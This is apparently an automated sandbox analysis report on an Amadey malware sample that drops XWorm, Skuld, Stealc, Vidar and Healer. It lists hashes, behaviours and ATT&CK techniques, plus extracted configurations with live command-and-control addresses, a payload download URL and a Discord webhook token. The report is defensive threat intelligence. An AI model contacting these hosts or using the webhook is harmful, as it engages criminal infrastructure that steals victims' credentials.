amadey | ab8b903ee062c93347eb738d00d0dbf707cdbbb8d26cf4dac7691ccbf8a8aff2

Analysis

max time kernel
109s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
22/03/2025, 13:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

G9UD0_random.exe
Size

2.0MB
MD5

453e433ce707a2dff379af17e1a7fe44
SHA1

c95d4c253627be7f36630f5e933212818de19ed7
SHA256

ab8b903ee062c93347eb738d00d0dbf707cdbbb8d26cf4dac7691ccbf8a8aff2
SHA512

9aa5b06bf01017aa13fd57350ba627cc892246e55e5adf8d785ff8a2252da7cbc28cf5e5e4170d877e4be01538a230646cfc581873acf183f0485c66e6397fd4
SSDEEP

49152:r3NOfcJRt0nsMQ8Yry0GO0WqMQvELO6fKM3O:TNt0nsR8Ud7p1O

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

skuld

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/9276-31032-0x0000000000400000-0x0000000000870000-memory.dmp	family_vidar_v7

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/memory/4852-25768-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral2/memory/8520-27085-0x0000000009A10000-0x0000000009EA6000-memory.dmp	family_xworm

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/12684-31759-0x0000000000D10000-0x000000000117A000-memory.dmp	healer
behavioral2/memory/12684-31758-0x0000000000D10000-0x000000000117A000-memory.dmp	healer
behavioral2/memory/12684-33109-0x0000000000D10000-0x000000000117A000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 6256 created 2556	6256	Organizations.com	42

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	767eec0559.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	G9UD0_random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
122	8520	powershell.exe
137	8520	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5604	powershell.exe
8520	powershell.exe
6932	powershell.exe
6124	powershell.exe
7944	powershell.exe
5244	powershell.exe

Downloads MZ/PE file 17 IoCs

flow	pid	Process
50	3856	rapes.exe
56	3856	rapes.exe
29	3856	rapes.exe
52	3260	svchost.exe
99	3856	rapes.exe
99	3856	rapes.exe
129	3856	rapes.exe
168	3856	rapes.exe
168	3856	rapes.exe
168	3856	rapes.exe
168	3856	rapes.exe
168	3856	rapes.exe
168	3856	rapes.exe
168	3856	rapes.exe
168	3856	rapes.exe
168	3856	rapes.exe
168	3856	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\b296ad91.sys	3e6778e2.exe
File created	C:\Windows\System32\Drivers\klupd_b296ad91a_arkmon.sys	3e6778e2.exe
File created	C:\Windows\System32\Drivers\klupd_b296ad91a_klbg.sys	3e6778e2.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klbg\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klbg.sys"	3e6778e2.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klark.sys"	3e6778e2.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_mark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_mark.sys"	3e6778e2.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b296ad91a_arkmon.sys"	3e6778e2.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b296ad91\ImagePath = "System32\\Drivers\\b296ad91.sys"	3e6778e2.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon\ImagePath = "System32\\Drivers\\klupd_b296ad91a_arkmon.sys"	3e6778e2.exe

Uses browser remote debugging 2 TTPs 22 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
10612	chrome.exe
1820	chrome.exe
2008	chrome.exe
3560	chrome.exe
10864	chrome.exe
10172	chrome.exe
6796	msedge.exe
4856	msedge.exe
4780	chrome.exe
7192	msedge.exe
9324	chrome.exe
2808	chrome.exe
2512	chrome.exe
11316	chrome.exe
9876	msedge.exe
1016	chrome.exe
9952	chrome.exe
10816	chrome.exe
11592	chrome.exe
10152	msedge.exe
3020	chrome.exe
1404	msedge.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	767eec0559.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	767eec0559.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	k3t05Da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	k3t05Da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	G9UD0_random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	G9UD0_random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	G9UD0_random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	k3t05Da.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	zx4PJh6.exe

Deletes itself 1 IoCs

pid	Process
792	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat	cmd.exe

Executes dropped EXE 25 IoCs

pid	Process
3856	rapes.exe
5524	408e0d3c0b.exe
5304	tK0oYx3.exe
3256	d3jhg_003.exe
5764	tzutil.exe
792	w32tm.exe
6412	k3t05Da.exe
7296	wjfOfXh.exe
7372	rapes.exe
8184	ARxx7NW.exe
4856	k3t05Da.exe
4852	k3t05Da.exe
9164	0000004419.exe
13164	OkH8IPF.exe
6204	251510eb.exe
3916	3e6778e2.exe
9124	50KfF6O.exe
8344	zx4PJh6.exe
7352	Kr9UTz2.exe
6256	Organizations.com
7372	Attributes.exe
5836	weC48Q7.exe
4840	windowscore.exe
9276	767eec0559.exe
8064	rapes.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	G9UD0_random.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	767eec0559.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys	3e6778e2.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys\ = "Driver"	3e6778e2.exe

Loads dropped DLL 64 IoCs

pid	Process
6412	k3t05Da.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe
4840	windowscore.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/files/0x0008000000024310-301.dat	agile_net
behavioral2/memory/6412-25696-0x0000000000F40000-0x000000000152C000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x0005000000009f78-25702.dat	themida
behavioral2/memory/6412-25706-0x0000000071040000-0x0000000071620000-memory.dmp	themida
behavioral2/memory/6412-25717-0x0000000071040000-0x0000000071620000-memory.dmp	themida
behavioral2/memory/6412-25772-0x0000000071040000-0x0000000071620000-memory.dmp	themida

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\21cfe041-1449-414c-bca3-7f6a3f0ac388 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{4e3e5cba-80fb-414b-aae1-de08db8462f8}\\21cfe041-1449-414c-bca3-7f6a3f0ac388.cmd\""	3e6778e2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	50KfF6O.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	k3t05Da.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	3e6778e2.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	3e6778e2.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000700000002434e-31415.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
13300	tasklist.exe
12508	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
1968	G9UD0_random.exe
3856	rapes.exe
7372	rapes.exe
9276	767eec0559.exe
8064	rapes.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 5524 set thread context of 2408	5524	408e0d3c0b.exe	99
PID 5304 set thread context of 1936	5304	tK0oYx3.exe	105
PID 6412 set thread context of 4852	6412	k3t05Da.exe	133
PID 13164 set thread context of 6616	13164	OkH8IPF.exe	141
PID 7352 set thread context of 6580	7352	Kr9UTz2.exe	163

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000900000001fab1-28836.dat	upx
behavioral2/memory/9124-28855-0x0000000000290000-0x0000000000D1E000-memory.dmp	upx
behavioral2/memory/9124-28857-0x0000000000290000-0x0000000000D1E000-memory.dmp	upx

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	251510eb.exe
File opened (read-only)	\??\VBoxMiniRdrDN	3e6778e2.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\RuntimeApp\0000004419.exe	ARxx7NW.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	G9UD0_random.exe
File opened for modification	C:\Windows\NecessityInfections	zx4PJh6.exe
File opened for modification	C:\Windows\VancouverPulse	zx4PJh6.exe
File opened for modification	C:\Windows\SheDrum	zx4PJh6.exe
File opened for modification	C:\Windows\InvestingTr	zx4PJh6.exe
File opened for modification	C:\Windows\CylinderPair	zx4PJh6.exe
File opened for modification	C:\Windows\OfficeForbes	zx4PJh6.exe
File opened for modification	C:\Windows\GuaranteesFear	zx4PJh6.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	3e6778e2.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	3e6778e2.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5080	6256	WerFault.exe	168

System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	251510eb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	767eec0559.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d3jhg_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	G9UD0_random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wjfOfXh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zx4PJh6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Organizations.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3e6778e2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
672	taskkill.exe
12344	taskkill.exe
6160	taskkill.exe
7096	taskkill.exe
9912	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
8028	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1968	G9UD0_random.exe
1968	G9UD0_random.exe
3856	rapes.exe
3856	rapes.exe
2408	MSBuild.exe
2408	MSBuild.exe
2408	MSBuild.exe
2408	MSBuild.exe
1936	MSBuild.exe
1936	MSBuild.exe
1936	MSBuild.exe
1936	MSBuild.exe
6124	powershell.exe
6124	powershell.exe
6124	powershell.exe
7296	wjfOfXh.exe
7296	wjfOfXh.exe
7372	rapes.exe
7372	rapes.exe
6412	k3t05Da.exe
6412	k3t05Da.exe
7944	powershell.exe
7944	powershell.exe
5604	powershell.exe
5604	powershell.exe
7944	powershell.exe
5604	powershell.exe
8520	powershell.exe
8520	powershell.exe
8520	powershell.exe
5244	powershell.exe
5244	powershell.exe
5244	powershell.exe
7208	powershell.exe
7208	powershell.exe
7208	powershell.exe
6616	MSBuild.exe
6616	MSBuild.exe
6616	MSBuild.exe
6616	MSBuild.exe
6932	powershell.exe
6932	powershell.exe
6932	powershell.exe
6580	MSBuild.exe
6580	MSBuild.exe
6580	MSBuild.exe
6580	MSBuild.exe
6256	Organizations.com
6256	Organizations.com
6256	Organizations.com
6256	Organizations.com
6256	Organizations.com
6256	Organizations.com
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
6256	Organizations.com
6256	Organizations.com
6256	Organizations.com
6256	Organizations.com
6880	svchost.exe
6880	svchost.exe
6880	svchost.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe
3916	3e6778e2.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3256	d3jhg_003.exe
3256	d3jhg_003.exe
3256	d3jhg_003.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	6124	powershell.exe
Token: SeDebugPrivilege	6412	k3t05Da.exe
Token: SeDebugPrivilege	7944	powershell.exe
Token: SeDebugPrivilege	5604	powershell.exe
Token: SeDebugPrivilege	8520	powershell.exe
Token: SeDebugPrivilege	4852	k3t05Da.exe
Token: SeDebugPrivilege	5244	powershell.exe
Token: SeDebugPrivilege	9164	0000004419.exe
Token: SeDebugPrivilege	7208	powershell.exe
Token: SeDebugPrivilege	6932	powershell.exe
Token: SeDebugPrivilege	3916	3e6778e2.exe
Token: SeBackupPrivilege	3916	3e6778e2.exe
Token: SeRestorePrivilege	3916	3e6778e2.exe
Token: SeLoadDriverPrivilege	3916	3e6778e2.exe
Token: SeShutdownPrivilege	3916	3e6778e2.exe
Token: SeSystemEnvironmentPrivilege	3916	3e6778e2.exe
Token: SeSecurityPrivilege	3916	3e6778e2.exe
Token: SeDebugPrivilege	9124	50KfF6O.exe
Token: SeBackupPrivilege	3916	3e6778e2.exe
Token: SeRestorePrivilege	3916	3e6778e2.exe
Token: SeDebugPrivilege	3916	3e6778e2.exe
Token: SeSystemEnvironmentPrivilege	3916	3e6778e2.exe
Token: SeSecurityPrivilege	3916	3e6778e2.exe
Token: SeCreatePermanentPrivilege	3916	3e6778e2.exe
Token: SeShutdownPrivilege	3916	3e6778e2.exe
Token: SeLoadDriverPrivilege	3916	3e6778e2.exe
Token: SeIncreaseQuotaPrivilege	3916	3e6778e2.exe
Token: SeSecurityPrivilege	3916	3e6778e2.exe
Token: SeSystemProfilePrivilege	3916	3e6778e2.exe
Token: SeDebugPrivilege	3916	3e6778e2.exe
Token: SeMachineAccountPrivilege	3916	3e6778e2.exe
Token: SeCreateTokenPrivilege	3916	3e6778e2.exe
Token: SeAssignPrimaryTokenPrivilege	3916	3e6778e2.exe
Token: SeTcbPrivilege	3916	3e6778e2.exe
Token: SeAuditPrivilege	3916	3e6778e2.exe
Token: SeSystemEnvironmentPrivilege	3916	3e6778e2.exe
Token: SeLoadDriverPrivilege	3916	3e6778e2.exe
Token: SeLoadDriverPrivilege	3916	3e6778e2.exe
Token: SeIncreaseQuotaPrivilege	3916	3e6778e2.exe
Token: SeSecurityPrivilege	3916	3e6778e2.exe
Token: SeSystemProfilePrivilege	3916	3e6778e2.exe
Token: SeDebugPrivilege	3916	3e6778e2.exe
Token: SeMachineAccountPrivilege	3916	3e6778e2.exe
Token: SeCreateTokenPrivilege	3916	3e6778e2.exe
Token: SeAssignPrimaryTokenPrivilege	3916	3e6778e2.exe
Token: SeTcbPrivilege	3916	3e6778e2.exe
Token: SeAuditPrivilege	3916	3e6778e2.exe
Token: SeSystemEnvironmentPrivilege	3916	3e6778e2.exe
Token: SeDebugPrivilege	13300	tasklist.exe
Token: SeDebugPrivilege	12508	tasklist.exe
Token: SeDebugPrivilege	4840	windowscore.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1968	G9UD0_random.exe
6256	Organizations.com
6256	Organizations.com
6256	Organizations.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
6256	Organizations.com
6256	Organizations.com
6256	Organizations.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 3856	1968	G9UD0_random.exe	88
PID 1968 wrote to memory of 3856	1968	G9UD0_random.exe	88
PID 1968 wrote to memory of 3856	1968	G9UD0_random.exe	88
PID 3856 wrote to memory of 5524	3856	rapes.exe	95
PID 3856 wrote to memory of 5524	3856	rapes.exe	95
PID 5524 wrote to memory of 696	5524	408e0d3c0b.exe	97
PID 5524 wrote to memory of 696	5524	408e0d3c0b.exe	97
PID 5524 wrote to memory of 696	5524	408e0d3c0b.exe	97
PID 5524 wrote to memory of 1016	5524	408e0d3c0b.exe	98
PID 5524 wrote to memory of 1016	5524	408e0d3c0b.exe	98
PID 5524 wrote to memory of 1016	5524	408e0d3c0b.exe	98
PID 5524 wrote to memory of 2408	5524	408e0d3c0b.exe	99
PID 5524 wrote to memory of 2408	5524	408e0d3c0b.exe	99
PID 5524 wrote to memory of 2408	5524	408e0d3c0b.exe	99
PID 5524 wrote to memory of 2408	5524	408e0d3c0b.exe	99
PID 5524 wrote to memory of 2408	5524	408e0d3c0b.exe	99
PID 5524 wrote to memory of 2408	5524	408e0d3c0b.exe	99
PID 5524 wrote to memory of 2408	5524	408e0d3c0b.exe	99
PID 5524 wrote to memory of 2408	5524	408e0d3c0b.exe	99
PID 5524 wrote to memory of 2408	5524	408e0d3c0b.exe	99
PID 3856 wrote to memory of 5304	3856	rapes.exe	102
PID 3856 wrote to memory of 5304	3856	rapes.exe	102
PID 5304 wrote to memory of 2968	5304	tK0oYx3.exe	104
PID 5304 wrote to memory of 2968	5304	tK0oYx3.exe	104
PID 5304 wrote to memory of 2968	5304	tK0oYx3.exe	104
PID 5304 wrote to memory of 1936	5304	tK0oYx3.exe	105
PID 5304 wrote to memory of 1936	5304	tK0oYx3.exe	105
PID 5304 wrote to memory of 1936	5304	tK0oYx3.exe	105
